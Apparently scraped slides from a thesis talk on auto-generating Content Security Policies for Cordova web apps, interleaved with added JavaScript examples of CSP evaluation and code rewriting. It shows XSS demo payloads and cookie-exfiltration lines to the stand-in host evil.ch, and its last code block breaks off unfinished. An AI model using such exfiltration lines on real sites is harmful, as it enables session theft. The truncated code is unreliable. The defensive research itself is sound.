![Page 1: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/1.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Autogenerating Content Security Policies to Prevent Code Injection in Mobile Web Applications
Basil Schöni
Software Composition Group, Institute of Computer Science
University of Berne
28.01.20
1 / 51
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
What is a mobile web app?
A mobile web app is a mobile application that is written with web technologies (HTML/CSS/JS).
WebView: Wrapped browser engine that can interpret HTML, CSS and JS and provides a bridge mechanism to interact with native code
Mobile Web Framework: Provides easy access to device resources across operating systems by abstracting away platform differences
Advantage: Compatibility amongst mobile platforms
Disadvantage: Susceptibility to code injection attacks
How does it work?
Code injection in web apps is a consequence of the fact that data and code can be mixed.
1 Untrusted data is accepted by the application
2 Unsafe data is not sanitized
3 Unsafe data is passed to the DOM in an unsafe manner
4 Unsafe data is rendered, causing all JavaScript code present in it to be executed
How does it work?
<p>Some attacker-controlled string</p>
<p><script>alert('EVIL')</script></p>
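The two lines above are the same paragraph before and after the attacker-controlled string becomes a script payload. As an added example (not code from the slides), the following shows step 3 of the injection chain in its unsafe form and in a hardened form that escapes the untrusted part first; the function names (escapeHtml, renderUnsafe, renderSafe, containsScriptTag) and the sample payload are this example's own.

```javascript
// Added example, not from the original slides. Demonstrates how mixing
// untrusted data into markup differs from rendering it as escaped text.

// Escape the five characters that let text break out of an HTML text
// node or a double-quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Step 3 of the chain on the slide: untrusted data is concatenated
// straight into markup, so data and code are mixed. Deliberately unsafe.
function renderUnsafe(untrusted) {
  return '<p>' + untrusted + '</p>';
}

// Hardened version: the same markup, but the untrusted part is escaped
// first, so the browser can only ever render it as text.
function renderSafe(untrusted) {
  return '<p>' + escapeHtml(untrusted) + '</p>';
}

// Crude check over rendered output: is there still a script tag in it?
// A detection aid only; a real HTML parser is needed for a complete answer.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample input: the payload from the slide.
const PAYLOAD = "<script>alert('EVIL')</script>";

// Usage: compare the two renderings.
console.log('unsafe:', renderUnsafe(PAYLOAD));
console.log('safe:  ', renderSafe(PAYLOAD));
```

The unsafe rendering reproduces the second line of the slide exactly; the safe rendering contains the same characters, but as entities, so no script element is created. Escaping at the sink is the fix for step 3; CSP, introduced in the next section, is the defence that still applies when such a sink is missed.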
What are the differences to traditional web apps?
Code injection in mobile web apps differs in some ways from injection in a 'normal' browser.
Unconventional injection channels: barcodes, WiFi SSIDs, file metadata, ...
More severe impacts:
More sensitive access via HTML5 (GPS, high-res cameras, always with its user)
More extensive access via JS interfaces (accelerometer, contacts, SMS, spreading of infection)
How does it work?
Content Security Policy is a security mechanism that restricts what resources can be loaded by the browser and whether some types of JS/CSS code are blocked.
Directives: script-src, style-src, img-src, media-src, connect-src, plugin-types, ...
Origins/Keywords: https://example.ch, data:, 'self', 'unsafe-inline', 'unsafe-eval', 'sha256-[hash]', 'strict-dynamic', ...
CSP rule: "img-src 'self' http://allowed.ch;"
Allowed: <img src="image.png">
Allowed: <img src="http://allowed.ch/image.png">
Disallowed: <img src="http://disallowed.ch/image.png">
CSP definition: <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src http://allowed.ch;">
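To make the three decisions on the slide mechanical, here is an added example (not from the slides) of a small evaluator for CSP fetch directives: it parses a policy string, falls back from a missing directive to default-src, and matches 'self', 'none', scheme sources such as data: and host sources. It deliberately omits paths, wildcards and nonce/hash sources; the page origin https://app.example and the function names are this example's assumptions.

```javascript
// Added example, not from the original slides: a simplified CSP
// fetch-directive evaluator, enough to reproduce the img-src decisions.

// Parse "img-src 'self' http://allowed.ch; default-src 'self'" into
// { "img-src": ["'self'", "http://allowed.ch"], "default-src": ["'self'"] }.
// As in the spec, a directive repeated in one policy keeps its first value.
function parsePolicy(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// Does one source expression match a resource URL, given the page's origin?
function sourceMatches(source, resourceUrl, pageOrigin) {
  if (source === "'none'") return false;
  if (source === '*') return true;                          // simplification: any scheme
  if (source === "'self'") return resourceUrl.origin === pageOrigin.origin;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) {               // scheme source, e.g. data:
    return resourceUrl.protocol === source.toLowerCase();
  }
  // Host source: "allowed.ch" or "http://allowed.ch[:port]".
  const hasScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(source);
  let hostSource;
  try {
    hostSource = new URL(hasScheme ? source : pageOrigin.protocol + '//' + source);
  } catch (e) {
    return false;                                           // unparsable source never matches
  }
  if (hasScheme && hostSource.protocol !== resourceUrl.protocol) return false;
  if (hostSource.port !== resourceUrl.port) return false;
  return hostSource.hostname === resourceUrl.hostname;
}

// Is a load governed by `directive` (e.g. "img-src") allowed by `policy`?
// A missing fetch directive falls back to default-src; if neither is
// present the load is not restricted at all.
function isAllowed(policy, directive, resource, page) {
  const directives = parsePolicy(policy);
  const pageOrigin = new URL(page);
  const resourceUrl = new URL(resource, page);              // resolve relative URLs against the page
  const sources = directives[directive] || directives['default-src'];
  if (sources === undefined) return true;
  return sources.some((s) => sourceMatches(s, resourceUrl, pageOrigin));
}

// Constructed example: the rule from the slide, evaluated for a page
// served from a hypothetical origin.
const PAGE = 'https://app.example/index.html';
const RULE = "img-src 'self' http://allowed.ch;";

for (const src of ['image.png', 'http://allowed.ch/image.png', 'http://disallowed.ch/image.png']) {
  console.log(src, '->', isAllowed(RULE, 'img-src', src, PAGE) ? 'allowed' : 'blocked');
}
```

The relative URL image.png resolves against the page and so matches 'self'; the two absolute URLs are decided by host matching alone. The default-src fallback is what makes the meta-tag definition on the slide restrictive for every resource type it does not name explicitly.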
What can be restricted?
Sources to load data from:
<img src="https://example.ch">
<embed src="https://example.ch">
<link rel="stylesheet" href="https://example.ch">
<script src="https://example.ch">
new Worker('https://example.ch');
...
URLs to connect to:
XMLHttpRequest.open('GET', 'https://example.ch');
new WebSocket('https://example.ch');
<form action="https://example.ch">
...
What can be restricted?
Inline scripts and styles:
<script>alert('XSS')</script>
<div onclick="alert('XSS')">
<style>.content { width: 30px; } </style>
document.querySelector('div').setAttribute('style', 'width: 30px;');
...
Evaluation of strings in scripts and styles:
eval("alert('XSS')")
window.setTimeout("alert('XSS')", 1000);
CSSStyleSheet.insertRule(".content { width: 30px; }")
...
What can be restricted?
Some other things: plugin-types, frame-ancestors, upgrade-insecure-requests, navigate-to, ...
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the most important way of injecting code
<script>alert('EVIL')</script>
Such scripts are blocked by default
"script-src 'unsafe-inline'" can allow them
Using hashes or nonces can allow them: "script-src 'sha256-[hash]';"
Trust propagation can allow them: "script-src 'sha256-[parent-hash]' 'strict-dynamic';"
This is the biggest security win provided by CSP
Unfortunately, 'unsafe-inline' is very common
91% of Cordova apps studied by one paper
87% of web apps analyzed by large-scale study
![Page 38: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/38.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>
Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval("alert('EVIL')")
Such expressions are blocked by default
"script-src 'unsafe-eval'" can allow them
Unfortunately, 'unsafe-eval' is also very common
92% of Cordova apps studied by one paper
82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily rely on string evaluation
14 / 51
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src="https://evil.ch/[cookie]">
xhr.open('POST', 'https://evil.ch'); xhr.send(cookie);
Such exfiltrations are blocked by default if an img-src / connect-src rule is present
"img-src evil.ch" / "connect-src evil.ch" can allow them
Unfortunately, whitelisting the general wildcard (*) is very common
77% of Cordova apps studied by one paper whitelist * in default-src
15 / 51
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
16 / 51
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions for real-world Cordova apps?
  1 Can we rewrite real-world Cordova apps to allow more strict CSP definitions?
  2 What patterns limit us in rewriting applications and generating CSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
  1 How prevalent are the patterns we can successfully rewrite?
  2 How prevalent are the patterns we cannot rewrite?
17 / 51
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
18 / 51
The problem
Many applications don't use any CSP at all
Of those that do, many apps use it in a way that doesn't leverage its main advantages
Many applications make use of APIs that are incompatible with strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy to deploy CSP for existing apps
Incompatible APIs should be rewritten in order to avoid losing strictness
Care must be taken to avoid breaking app functionalities
19 / 51
The pipeline
[Figure: pipeline diagram. Stages: Find all HTML files; Set constant CSP directives; Iterate over HTML files: Extract sources from HTML; Process related JS and write changes to JS snippets; Extract sources from HTML and JS; Rewrite CSS and extract related sources; Rewrite scripts and extract related sources; Write changes to HTML files; Write CSP definition to HTML file]
20 / 51
Setting constant CSP directives
"default-src 'self'; upgrade-insecure-requests;"
23 / 51
Extracting sources from HTML
manifest-src: <link rel="manifest" href="https://example.ch">
base-uri: <base href="https://example.ch/">
plugin-types: <object data="https://example.ch/flash" type="application/x-shockwave-flash">
form-action: <form action="javascript:alert('FORM')" method="post">
25 / 51
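The two slides above describe the first two pipeline stages: start every policy from the constant directives, then add the sources that `<link rel="manifest">`, `<base>`, `<object>` and `<form>` contribute. The following is an added example illustrating that, not code from the thesis tool. It is regex-based over a constructed HTML snippet (a real pipeline would walk a parsed DOM), reduces each URL to its origin as a CSP host source, and reports values that cannot become a host source at all (the `javascript:` form action) instead of silently dropping them. The rule table, the `unresolvable` list and the `<meta>` emitter are assumptions of this example.

```javascript
// Added example, not the thesis tool's code: constant directives plus the
// sources extracted from HTML elements, serialised into one policy string.

// Constant directives every generated policy starts from.
const CONSTANT_DIRECTIVES = {
  "default-src": ["'self'"],
  "upgrade-insecure-requests": [],
};

// Element/attribute pairs that feed a directive. plugin-types takes the MIME
// type verbatim; the others take a URL that is reduced to its origin.
const HTML_SOURCE_RULES = [
  { directive: "manifest-src", tag: "link", attr: "href", requireAttr: /\brel=["']manifest["']/i },
  { directive: "base-uri", tag: "base", attr: "href" },
  { directive: "plugin-types", tag: "object", attr: "type", verbatim: true },
  { directive: "form-action", tag: "form", attr: "action" },
];

// Reduce a URL to a CSP host-source expression. Relative URLs are already
// covered by 'self'. A javascript: URL has no host, so no host source can
// allow it; it is reported for manual review rather than dropped.
function toSourceExpression(url) {
  if (/^\s*javascript:/i.test(url)) return null;
  try {
    return new URL(url).origin;
  } catch (e) {
    return "'self'";
  }
}

// Value of a quoted attribute inside an element's attribute text.
function attributeValue(attrs, name) {
  const m = new RegExp(`\\b${name}=(?:"([^"]*)"|'([^']*)')`, "i").exec(attrs);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2];
}

function extractHtmlSources(html) {
  const sources = {};
  const unresolvable = [];
  for (const rule of HTML_SOURCE_RULES) {
    const tagRe = new RegExp(`<${rule.tag}\\b([^>]*)>`, "gi");
    for (const m of html.matchAll(tagRe)) {
      const attrs = m[1];
      if (rule.requireAttr && !rule.requireAttr.test(attrs)) continue;
      const value = attributeValue(attrs, rule.attr);
      if (value === null) continue;
      const expr = rule.verbatim ? value : toSourceExpression(value);
      if (expr === null) {
        unresolvable.push({ directive: rule.directive, value });
        continue;
      }
      (sources[rule.directive] = sources[rule.directive] || new Set()).add(expr);
    }
  }
  return { sources, unresolvable };
}

// Serialise the constant directives plus the extracted sources.
function buildPolicy(sources) {
  const directives = {};
  for (const [name, values] of Object.entries(CONSTANT_DIRECTIVES)) directives[name] = [...values];
  for (const [name, set] of Object.entries(sources)) {
    directives[name] = [...(directives[name] || []), ...set];
  }
  return Object.entries(directives)
    .map(([name, values]) => (values.length ? `${name} ${values.join(" ")}` : name))
    .join("; ") + ";";
}

// The <meta> element the pipeline writes into each HTML file.
function cspMetaTag(policy) {
  return `<meta http-equiv="Content-Security-Policy" content="${policy}">`;
}

// Constructed sample input mirroring the slide (not from the thesis corpus).
const SAMPLE_HTML = `
<link rel="manifest" href="https://example.ch">
<base href="https://example.ch/">
<object data="https://example.ch/flash" type="application/x-shockwave-flash"></object>
<form action="javascript:alert('FORM')" method="post"></form>
`;

const extracted = extractHtmlSources(SAMPLE_HTML);
console.log(cspMetaTag(buildPolicy(extracted.sources)));
console.log("needs manual review:", extracted.unresolvable);
```

Note that `base-uri` and `form-action` do not inherit from `default-src`, so leaving them out of the generated policy would let injected markup retarget relative URLs or post form data elsewhere; this is why the extractor populates them explicitly rather than relying on `'self'`.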
Processing related Javascript
Gather all related Javascript
Extract code from inline Javascript tags
<script>alert('INLINE')</script>
Load code from external Javascript tags
<script src="app.js"></script>
Extract code from inline event handlers
<div onclick="alert('EVENT HANDLER')"></div>
27 / 51
Processing related Javascript
Extract all URLs
Extract sources for connect-src
XMLHttpRequest.open("GET", "https://example.ch");
new WebSocket("https://example.ch");
...
Extract sources for worker-src
new Worker("https://example.ch/w.js");
navigator.serviceWorker.register("https://example.ch/w.js");
...
28 / 51
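As an added example of the URL extraction step on this slide (not the thesis tool's own code), the function below matches the four call shapes shown, resolves string-literal arguments to host sources for `connect-src` and `worker-src`, and reports every non-literal argument for manual review, which is the "non-constant parameters" limitation discussed later in the talk. The rule list, the `unresolved` report and the sample script are assumptions of this example.

```javascript
// Added example, not the thesis tool's code: host sources for connect-src and
// worker-src from the call shapes on the slide, over a constructed script.

const JS_URL_RULES = [
  // XMLHttpRequest.open(method, url): the URL is the second argument.
  { directive: "connect-src", re: /\.open\(\s*(["'])[A-Za-z]+\1\s*,\s*([^,)]+)\)/g, group: 2 },
  { directive: "connect-src", re: /new\s+WebSocket\(\s*([^,)]+)[,)]/g, group: 1 },
  { directive: "worker-src", re: /new\s+(?:Shared)?Worker\(\s*([^,)]+)[,)]/g, group: 1 },
  { directive: "worker-src", re: /serviceWorker\.register\(\s*([^,)]+)[,)]/g, group: 1 },
];

// Returns the content of a bare string literal such as "https://example.ch"
// or '/sw.js', or null when the argument is an expression or a variable.
function literalValue(arg) {
  const m = /^(["'])(.*)\1$/.exec(arg.trim());
  return m ? m[2] : null;
}

// Absolute URL -> origin (scheme + host [+ port]); relative URL -> 'self'.
function toSourceExpression(url) {
  try {
    return new URL(url).origin;
  } catch (e) {
    return "'self'";
  }
}

function extractJsSources(js) {
  const sets = { "connect-src": new Set(), "worker-src": new Set() };
  const unresolved = [];
  for (const rule of JS_URL_RULES) {
    for (const m of js.matchAll(rule.re)) {
      const arg = m[rule.group];
      const literal = literalValue(arg);
      if (literal === null) {
        // A computed URL cannot be turned into a host source statically.
        unresolved.push({ directive: rule.directive, argument: arg.trim(), snippet: m[0] });
        continue;
      }
      sets[rule.directive].add(toSourceExpression(literal));
    }
  }
  return {
    sources: Object.fromEntries(Object.entries(sets).map(([d, s]) => [d, [...s]])),
    unresolved,
  };
}

// Constructed sample script (not from the thesis corpus).
const SAMPLE_JS = `
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://example.ch/api/items");
var ws = new WebSocket("wss://example.ch/live");
var w = new Worker("https://example.ch/w.js");
navigator.serviceWorker.register("/sw.js");
xhr.open("POST", apiBase + "/upload");
`;

console.log(JSON.stringify(extractJsSources(SAMPLE_JS), null, 2));
```

The unresolved entry is the interesting output for a reviewer: an app whose endpoints are computed at runtime cannot get a tight `connect-src` from static extraction alone, and widening the directive to cover the unknown host is a policy decision, not something the generator should do silently.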
Processing related Javascript
Rewriting APIs impacted by style-src
setAttribute
// Original
a.setAttribute("style", "display:none");
// Rewritten
a.style.display = "none";
29 / 51
Processing related Javascript
Rewriting APIs impacted by style-src
cssText
// Original
a.style.cssText = "background-color:none";
// Rewritten
a.style.backgroundColor = "none";
30 / 51
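The two `style-src` rewrites above (slides 29 and 30) both reduce to the same transformation: split a CSS declaration string into individual property assignments on `element.style`. The following is an added example of that transformation (not the thesis tool's code); it handles two cases the slides do not show, `!important` and custom properties, which have no camelCase setter and need `setProperty`. The statement shapes it recognises and the helper names are assumptions of this example.

```javascript
// Added example, not the thesis tool's code: rewrite
//   a.setAttribute("style", "...")  and  a.style.cssText = "..."
// into per-property assignments, the form that strict style-src permits.

// "background-color" -> "backgroundColor"
function kebabToCamel(prop) {
  return prop.replace(/-([a-z])/g, (_, c) => c.toUpperCase());
}

// "color: red; height:100px" -> [{prop: "color", value: "red"}, ...]
function parseDeclarations(cssText) {
  return cssText
    .split(";")
    .map((d) => d.trim())
    .filter(Boolean)
    .map((d) => {
      const i = d.indexOf(":");
      if (i < 0) throw new Error("malformed declaration: " + d);
      return { prop: d.slice(0, i).trim().toLowerCase(), value: d.slice(i + 1).trim() };
    });
}

// One JavaScript statement per declaration, assigning onto target.style.
function rewriteDeclarations(target, cssText) {
  return parseDeclarations(cssText).map(({ prop, value }) => {
    const important = /\s*!important$/i.test(value);
    const plain = value.replace(/\s*!important$/i, "");
    if (prop.startsWith("--") || important) {
      // Custom properties and !important cannot be expressed through the
      // camelCase setters; setProperty covers both.
      const priority = important ? ', "important"' : "";
      return `${target}.style.setProperty(${JSON.stringify(prop)}, ${JSON.stringify(plain)}${priority});`;
    }
    return `${target}.style.${kebabToCamel(prop)} = ${JSON.stringify(plain)};`;
  });
}

// Rewrite a single statement of either slide shape. Returns the list of
// replacement statements, or null when the argument is not a string literal
// (a variable cannot be rewritten statically and is left for manual review).
function rewriteStyleStatement(stmt) {
  let m = /^\s*([\w.$]+)\.style\.cssText\s*=\s*(["'])(.*)\2\s*;?\s*$/.exec(stmt);
  if (m) return rewriteDeclarations(m[1], m[3]);
  m = /^\s*([\w.$]+)\.setAttribute\(\s*(["'])style\2\s*,\s*(["'])(.*)\3\s*\)\s*;?\s*$/.exec(stmt);
  if (m) return rewriteDeclarations(m[1], m[4]);
  return null;
}

// Constructed sample statements (not from the thesis corpus).
for (const stmt of [
  'a.setAttribute("style", "display:none");',
  'a.style.cssText = "background-color:none";',
  'el.style.cssText = "color: red !important; --gap: 4px";',
  "a.style.cssText = someVariable;",
]) {
  console.log(stmt, "->", rewriteStyleStatement(stmt));
}
```

One behavioural difference to keep in mind when applying this rewrite: assigning `cssText` replaces every existing inline declaration on the element, whereas per-property assignments only add or overwrite the listed ones. Where the original relied on the clearing effect, the rewrite needs an explicit reset first.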
Processing related Javascript
Rewriting APIs impacted by style-src
insertRule
// Original
stylesheet.insertRule("#someId { color: white }", 0);
// Rewritten
var newStyleTag = document.createElement("style");
newStyleTag.innerText = "#someId { color: white }";
document.head.appendChild(newStyleTag);
31 / 51
Processing related Javascript
Rewriting APIs impacted by script-src
eval
// Original
eval('alert("Example")');
eval('{"key1": "value1", "key2": "value2"}');
// Rewritten
alert("Example");
JSON.parse('{"key1": "value1", "key2": "value2"}');
32 / 51
Processing related Javascript
Rewriting APIs impacted by script-src
setTimeout/setInterval
// Original
setTimeout('alert("Example")', 1000);
setInterval('alert("Example")', 1000);
// Rewritten
setTimeout(function() {alert("Example")}, 1000);
setInterval(function() {alert("Example")}, 1000);
33 / 51
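The `eval` and `setTimeout`/`setInterval` rewrites on the two slides above share one decision: the string argument must be a literal, and for `eval` the literal is either JSON data (then `JSON.parse` is the drop-in replacement) or code (then the code runs directly). The following is an added example of that decision, not the thesis tool's code; it works on single statements with a string literal and returns `null` for anything else, so that a variable argument is reported rather than guessed. The function names and the regular expressions are assumptions of this example, and the literal body is taken verbatim (escape sequences inside the literal are not decoded).

```javascript
// Added example, not the thesis tool's code: statement-level rewrites for
// eval(...) and setTimeout/setInterval(...) with a string-literal argument.

function isJsonText(text) {
  try {
    JSON.parse(text);
    return true;
  } catch (e) {
    return false;
  }
}

// eval('<json>')  -> JSON.parse('<json>');
// eval('<code>')  -> <code>;
// Returns null when the argument is not a string literal.
function rewriteEval(stmt) {
  const m = /^\s*eval\(\s*(["'])(.*)\1\s*\)\s*;?\s*$/.exec(stmt);
  if (!m) return null;
  const [, quote, body] = m;
  if (isJsonText(body)) return `JSON.parse(${quote}${body}${quote});`;
  return body.replace(/;?\s*$/, "") + ";";
}

// setTimeout('<code>', ms) -> setTimeout(function() {<code>}, ms);
// Returns null when the first argument is not a string literal.
function rewriteTimer(stmt) {
  const m = /^\s*(setTimeout|setInterval)\(\s*(["'])(.*)\2\s*,\s*(.*)\)\s*;?\s*$/.exec(stmt);
  if (!m) return null;
  const [, fn, , code, rest] = m;
  return `${fn}(function() {${code}}, ${rest});`;
}

// Try both rewrites; null means "needs manual review" (a computed string,
// or already a function reference that needs no rewrite).
function rewriteScriptStatement(stmt) {
  const viaEval = rewriteEval(stmt);
  if (viaEval !== null) return viaEval;
  return rewriteTimer(stmt);
}

// Constructed sample statements (not from the thesis corpus).
for (const stmt of [
  `eval('alert("Example")');`,
  `eval('{"key1": "value1", "key2": "value2"}');`,
  `setTimeout('alert("Example")', 1000);`,
  `setInterval('alert("Example")', 1000);`,
  `setTimeout(someVariable, 1000);`,
]) {
  console.log(stmt, "->", rewriteScriptStatement(stmt));
}
```

The JSON branch matters beyond CSP compliance: `eval` on data that arrived over the network is a code-injection sink in itself, so the rewrite removes a vulnerability class rather than just satisfying `script-src`.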
Processing related Javascript
Rewriting APIs impacted by script-src
Function
// Original
new Function("a", "b", "return a*b");
// Rewritten (parenthesised: a bare anonymous function is not a valid statement)
(function(a, b) {return a*b});
34 / 51
Processing related Javascript
Rewriting APIs impacted by script-src
setAttribute for event handlers
// Original
a.setAttribute("onclick", ’alert("XSS")’);
// Rewritten
a.onclick = function() {alert("XSS")};
35 / 51
Extracting sources from HTML and Javascript
connect-src: <a ping="https://example.ch">
frame-src: <iframe src="https://example.ch">
img-src: <img src="https://example.ch/image.jpg">
media-src: <audio src="https://example.ch">
object-src: <object data="https://example.ch">
Combine with data from JS
37 / 51
Rewriting styles and extracting related sources
Rewriting inline style attributes
// Original
<div style="height: 100px;">
// Rewritten
<div id="tmYuSGfL">
<style>#tmYuSGfL { height: 100px; }</style>
39 / 51
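The inline-style rewrite on this slide moves each `style` attribute into an id-selector rule so that the element no longer needs `'unsafe-inline'` for `style-src`. The following is an added example of that rewrite (not the thesis tool's code). The slide shows a random-looking id; this example uses a deterministic counter so results are reproducible, reuses an existing `id` attribute instead of adding a second one, and keeps self-closing tags intact. The generator, the regular expression and the sample markup are assumptions of this example.

```javascript
// Added example, not the thesis tool's code: move every style="..." attribute
// into a <style> rule keyed by the element's id.

// Deterministic ids for this example; the tool on the slide uses random ones.
function makeIdGenerator(prefix = "csp") {
  let n = 0;
  return () => `${prefix}-${++n}`;
}

// Returns the rewritten HTML and the <style> element holding the moved rules.
function rewriteInlineStyles(html, nextId = makeIdGenerator()) {
  const rules = [];
  const out = html.replace(
    /<([a-zA-Z][\w-]*)\b([^>]*?)\s+style=("([^"]*)"|'([^']*)')([^>]*)>/g,
    (whole, tag, before, quoted, dq, sq, after) => {
      const css = (dq !== undefined ? dq : sq).trim();
      // Keep a trailing "/" of self-closing tags out of the attribute list.
      const selfClosing = /\/\s*$/.test(after);
      const rest = before + after.replace(/\s*\/\s*$/, "");
      // Reuse an existing id rather than emitting a duplicate id attribute.
      const idMatch = /\bid=(?:"([^"]*)"|'([^']*)')/.exec(rest);
      const id = idMatch ? (idMatch[1] !== undefined ? idMatch[1] : idMatch[2]) : nextId();
      rules.push(`#${id} { ${css.endsWith(";") ? css : css + ";"} }`);
      const attrs = idMatch ? rest : `${rest} id="${id}"`;
      return `<${tag}${attrs}${selfClosing ? " /" : ""}>`;
    }
  );
  return { html: out, styleTag: rules.length ? `<style>${rules.join("\n")}</style>` : "" };
}

// Constructed sample markup (not from the thesis corpus).
const SAMPLE_MARKUP =
  '<div style="height: 100px;"><p id="intro" style="color: red">x</p><img src="a.png" style="width:10px"/></div>';

const rewritten = rewriteInlineStyles(SAMPLE_MARKUP);
console.log(rewritten.html);
console.log(rewritten.styleTag);
```

This is where "care must be taken to avoid breaking app functionalities" applies: an inline `style` attribute outranks every stylesheet rule in the cascade, while an id selector does not, so an existing `!important` rule or a later rule on the same id can now win. Running the app's visual tests after the rewrite is the practical check; the generated `<style>` element itself still needs a hash in `style-src`, which is the next stage of the pipeline.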
Rewriting styles and extracting related sources
Iterate over all CSS rules
style-src: @import url("https://example.ch/styles.css")
font-src: @font-face { src: url("https://not-example.com/font"); }
img-src: background-image: url("image.gif");
Generate all hashes
Combine with data from JS
40 / 51
Rewriting scripts and extracting related sources
Rewriting inline event handlers
// Original
<div onclick='alert("Example")'>
// Rewritten
<div id="tmYuSGfL">
<script>
document.getElementById("tmYuSGfL")
.addEventListener(
"click", // the event name carries no "on" prefix; "onclick" would never fire
function() { alert("Example") }
)
</script>
42 / 51
Rewriting scripts and extracting related sources
Generate all hashes
Combine with data from JS
Add 'strict-dynamic'
43 / 51
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
44 / 51
Limiting patterns
Patterns inherent to CSP
No full equivalent for the "Function" constructor
new Function("a", "b", "return a*b");
(function(a, b) {return a*b});
Patterns inherent to specific use cases
Apps that connect to user-defined URLs
Apps that connect to dynamically chosen API endpoints
45 / 51
Limiting patterns
Patterns inherent to my approach
Non-constant parameters in restricted APIs
a.style.cssText = someVariable
setTimeout(someVariable, 1000)
...
Adding styles/scripts implicitly from strings
someElement.innerHTML = "<div onclick='...'></div>";
someElement.innerHTML = "<div style='...'></div>";
someElement.innerHTML = "<style>...</style>";
HTML templating engines
Inability to rewrite remote resources
46 / 51
Empirical results
| API | % Apps | % Apps (w/o library files) |
| --- | --- | --- |
| setTimeout / setInterval | 98.30 | 73.65 |
| eval | 89.45 | 36.89 |
| cssText | 83.27 | 28.68 |
| Function | 61.21 | 29.41 |
| setAttribute (style) | 30.91 | 21.45 |
| insertRule | 4 | 4 |
| setAttribute (event handler) | 3.88 | 3.31 |

Table 1: Apps containing CSP-relevant APIs
47 / 51
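As an added example (not part of the thesis or its rewriting tool) tying the limiting patterns of slide 46 to the APIs counted in Table 1: a small scanner that flags those APIs and separates constant string arguments, which a rewriter can attempt, from the non-constant parameters and implicit markup-from-string cases it cannot resolve statically. The regular expressions, the rule table, the `constantArg` field and the sample source are assumptions constructed for this example; a real tool would work on an AST.

```javascript
// Added example, not the thesis's tool: a line-oriented scanner for the CSP-relevant
// APIs of Table 1 that separates constant string arguments (what a rewriter can
// attempt) from the non-constant / implicit-markup patterns of slide 46 it cannot.
// Regexes, rule table and sample input are constructed for this example.
const STRING_LITERAL = /^\s*(['"])(?:\\.|(?!\1).)*\1\s*$/;
const CALLABLE = /^\s*(function\b|\([^)]*\)\s*=>|\w+\s*=>)/;
// Group 1 captures the argument CSP cares about; `keyword` is the relaxation
// the app would need in its policy without a rewrite.
const RULES = [
  { api: 'setTimeout/setInterval', keyword: "script-src 'unsafe-eval'", re: /\bset(?:Timeout|Interval)\(\s*([^,]+?)\s*,/ },
  { api: 'eval', keyword: "script-src 'unsafe-eval'", re: /\beval\(\s*([^)]+?)\s*\)/ },
  { api: 'Function', keyword: "script-src 'unsafe-eval'", re: /\bnew\s+Function\(\s*([^)]+?)\s*\)/ },
  { api: 'cssText', keyword: "style-src 'unsafe-eval'", re: /\.style\.cssText\s*=\s*([^;]+)/ },
  { api: 'setAttribute (style)', keyword: "style-src 'unsafe-eval'", re: /\.setAttribute\(\s*['"]style['"]\s*,\s*([^)]+?)\s*\)/ },
  { api: 'setAttribute (event handler)', keyword: "script-src 'unsafe-inline'", re: /\.setAttribute\(\s*['"]on\w+['"]\s*,\s*([^)]+?)\s*\)/ },
  { api: 'insertRule', keyword: "style-src 'unsafe-eval'", re: /\.insertRule\(\s*([^,)]+?)\s*[,)]/ },
];
// innerHTML strings carrying inline handlers, style attributes or <style>
// blocks look constant but add scripts/styles the policy must still allow.
const INNER_HTML = /\.innerHTML\s*=\s*(['"])(.*?)\1/;
const IMPLICIT_MARKUP = /<style\b|\son\w+\s*=|\sstyle\s*=/i;
function classify(arg) {
  if (STRING_LITERAL.test(arg)) return 'constant';
  if (CALLABLE.test(arg)) return 'callable';
  return 'non-constant';
}
function scan(source) {
  const findings = [];
  source.split('\n').forEach((line, i) => {
    for (const rule of RULES) {
      const m = rule.re.exec(line);
      if (!m) continue;
      const kind = classify(m[1]);
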